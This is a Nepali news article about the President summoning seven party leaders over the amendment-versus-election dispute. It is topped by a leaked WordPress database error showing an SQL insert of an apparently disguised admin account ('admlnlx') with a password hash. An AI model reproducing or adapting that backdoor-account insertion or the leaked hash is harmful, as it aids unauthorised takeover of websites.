WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B4Qfm3wWZQwhwWxJBi1Gjg.Gh3NbsD/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-22 08:02:51', '', 'admlnlx', 'admlnlx')
काठमाण्डौं, फागुन २-
राष्ट्रपति विद्यादेवी भण्डारीले संसदमा रहेका बिभिन्न सात दलका नेताहरुलाई छलफलमा बोलाएकी छन्। सोमबार दिउँसो राष्ट्रपति कार्यालय शितल निवासमा नेपाली कांग्रेस, नेकपा एमाले, नेकपा माओवादी केन्द्र, राप्रपा र मधेस केन्द्रित तीन दलका नेताहरुलाई बोलाएकी हुन्।
बैठकमा प्रधानमन्त्री पुष्पकमल दाहाल प्रचण्ड, नेपाली कांग्रेसका सभापति शेरबहादुर देउवा, महामन्त्री डा. शशांक कोइराला र पूर्व महामन्त्री कृष्णप्रसाद सिटौला, नेकपा एमालेबाट अध्यक्ष केपी शर्मा ओली, नेकपा माओवादी केन्द्रबाट रामबहादुर थापा बादल, राप्रपाबाट राष्ट्रिय अध्यक्ष प्रकाशचन्द्र लोहनी र अध्यक्ष कमल थापा सहभागी छन्। त्यस्तै संघीय समाजवादी फोरमका राजेन्द्र श्रेष्ठ, मधेसी जनाधिकार फोरम लोकतान्त्रिकका अध्यक्ष विजयकुमार गच्छदार र उपाध्यक्ष जितेन्द्र देव र तराई मधेस लोकतान्त्रिक पार्टीका अध्यक्ष महन्थ ठाकुर र हृदयश त्रिपाठी सहभागी छन्। दलहरुबीच पहिला संविधान संशोधन कि चुनाव भन्ने विवाद भइरहेका बेला राष्ट्रपतिले यस विवादमा संलग्न दलका नेताहरुलाई छलफलमा बोलाएकी हुन्।